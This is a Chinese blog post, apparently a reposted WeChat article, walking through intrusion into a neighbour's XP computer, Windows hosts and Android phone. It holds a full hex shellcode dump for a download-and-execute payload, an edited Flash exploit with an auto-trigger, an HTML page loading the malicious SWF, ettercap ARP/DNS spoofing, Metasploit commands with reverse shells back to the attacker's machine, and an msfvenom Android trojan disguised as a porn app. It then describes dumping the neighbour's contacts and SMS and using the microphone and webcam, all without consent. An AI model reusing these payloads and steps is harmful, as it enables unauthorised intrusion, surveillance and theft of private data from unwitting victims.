人常说，兴趣是最好的老师，谷歌、百度可谓是自己的家教，我觉得如果一个人不管做什么，如果达到那种痴狂的状态，我想成功也不会离你太远（我除外）哈哈，同样呢，今天给大家写的这篇文章是一篇家庭内网安全的文章，之前也发布到其他平台，所以看过此文章的看官请绕道，“只有不努力的黑客，没有攻不破的系统-----360周鸿祎”，“安全是在攻与防的对立中，寻求统一-----黑客防线孙彬”，来解释一下这句话，用台湾曾仕强先生的话说，万物都是阴阳，太极生两仪，两仪生四相，四相生八卦，千百年来，不管是国家政权还是各行各业的这种更新迭代，起起落落，都遵循一个道理，就是矛于盾的此消彼长，正所谓道高一尺魔高一丈，当然还有话，正所谓邪不压正，所以网络安全也不例外，那就是这种攻防的对立并且还是统一，这就是世界，这就是苍生万物所遵循的规律。。。好了开正本。。。

闲来无事，就想着写一篇内网渗透大杂烩的文章，不搞别的就搞邻居

第一篇  利用CVE-2014-6332 IE全版本漏洞入侵邻居XP电脑首先开篇的是入侵邻居的电脑，邻居是个电脑盲，我所了解的情况是2011年买了电脑，几乎不怎么用，而且也不安装杀毒，估计补丁都不会打吧，就星期天用一下，正好今天周末，于是乎就开始下面的渗透过程。首先net view（这里就不用nmap扫了）如图：

Zhongce那台是我的，我们ping一下ping BBLBX6GQE624W88如图：

USER-20150620EZ这个就不用Ping了是我的物理主机名，OK，既然没打补丁，那就不用nessus扫描了，直接测试CVE-2014-6332 IE全版本漏洞了，我们需要搭建一个web环境这里我用小旋风，先配置一个远控木马如图：

192.168.0.104是我的物理ip，然后选择域名上线方式，生成木马丢到web跟木下，下面我们用k8飞刀工具来生成一个网马，点编码然后输入木马地址：http://192.168.0.104:89/server.exe然后点右键hacking-0day-ie全版本漏洞，生成网马如图：

然后我们把网名名称改为：index.htm然后丢到kai linux /var/www/html/下面

我们的思路是通过ettercap来dns+arp攻击的方法来使xp种木马，对了记得执行service apache2 start命令启动kali web服务，下面我们来设置一下etteracap的etter.dns如图：

192.168.0.113为kali的ip地址，然后ettercap -G启动图形化界面，点

然后选择eth0

然后选择hostlist，如图：

前面我们已经Ping过了xp系统ip为192.168.0.116，那么我们就把这个目标加到Target1，然后把网关地址加到Target2，然后在按照如图操作：

然后选择Plugins，选择

双击以后，然后开始

大概过了半分钟发现有主机上线，哈哈欺骗成功了

我们打开屏幕看看

他肯定是看视屏然后发现看不了了就打开hao123测试网络，哈哈我们不要搞什么破坏卸载掉木马。。。这样渗透测试邻居XP的渗透过程就完结了。。。

第二篇  flash0day之手工修改代码利用msf制作下载者实例入侵演示

利用到的工具：
Msf
Ettercap
Adobe Flash CS6
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份

下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options如图：

然后setEXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图:

然后执行generate-t dword生成shellcode，如下：

复制代码到文本下便于我们一会编辑flashexp，如下：

0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000

下面我们来修改flash0day exp，需要修改三个文件，分别为：

先修改ShellWin32.as，部分源代码如图：

我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下

然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图：

换行在后面加一句TryExpl();注意是l不是数字1，然后如图：

然后点保存，下面我们来编译一下，打开
exp1.fla然后点文件-发布，看看编译没错误

然后我们把生成的
exp1.swf丢到kailinux 的/var/www/html下：然后把这段代码好好编辑一下

<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/></head><body><h2> Please wait, the requested page is loading...</h2><br><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><PARAM NAME=movie VALUE="http://192.168.0.109/exp1.swf"></OBJECT></body><script>    setTimeout(function () {        window.location.reload();    }, 10000);</script></html>

其实可以写一个好点的前端打码诱骗别人去执行操作

注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图：

下面我们用ettercap欺骗如图：

下面我们随便访问个网站看看：我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，木马上线如图：

我们看另一台

提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。不管他了，第二篇over。。。

第三篇  cve2015-5122漏洞实例演示虚拟机关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kailinux msfconsole命令启动msf如图：
search cve-2015-5122如图：

下面我们敲如下命令：
use exploit/multi/browser/adobe_flash_opaque_background_uaf
set PAYLOADwindows/meterpreter/reverse_tcp
set LHOST 192.168.0.109
set URIPATH /                       /*根目录*/
set SRVHOST192.168.0.109  //192.168.0.109为kailiip地址
set SRVPORT 80           /*80端口*/使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用然后show options如图：

一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：

然后ettercap-G命令打开ettercap，我们要攻击的主机ip是192.168.0。115

Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf

成功了，这时候我们断开ettercap，如图：

Screenshot如图：

第四篇  MS14-064漏洞测试入侵win7我发现msf下的exp只能针对带有powershell的机器进行攻击，我们用如下方法来搞演示开启msf执行命令useexploits/windows/browser/ms14_064_ole_code_execution如图：

然后执行命令set PAYLOAD windows/meterpreter/reverse_tcp
            set AllowPowershellPrompttrue
            Set LHOST 192.168.0.109
            set SRVHOST 192.168.0.109
            Set uripath share
            Set srvport 80

show options

下面我们来访问本地地址成功如图：

第五篇  msf+ettercap入侵邻居安卓手机首先启动msf先用kali生成一个安卓木马，如下命令：
Msfvenom -p android/meterpreter/reverse_tcpLHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk

为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻然后进入msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.109 //ip为kaili的ip
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
Exploit

下面我们开启ettercap-G我物理IP为

别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的，下面我们来设置一下

在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了

我们试着访问一下看看，别出什么错，访问正常。。

下面我们开始攻击

大概过了5分钟多，发现反弹成功了，哈哈老大叔还不错一看日本AV哈哈估计上劲就安装了。。

执行命令
dump_contacts    --》这个是导出电话
dump_sms                --》这个是导出信息
record_mic     Record audio from the default microphone forX seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specifiedwebcam
webcam_stream  Play a video stream from the specified webcam生成电话薄txt

我们打开看一下电话薄

打开短信看一下

给它安装DroidJack木马，使用方法如图：

切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口否则上线不了

文件管理如图：

短信管理如图：

查看安装app如图：

查看浏览过的网页如图：

原文链接：https://mp.weixin.qq.com/s/PFhvUwKHT2h-xROtf03iEA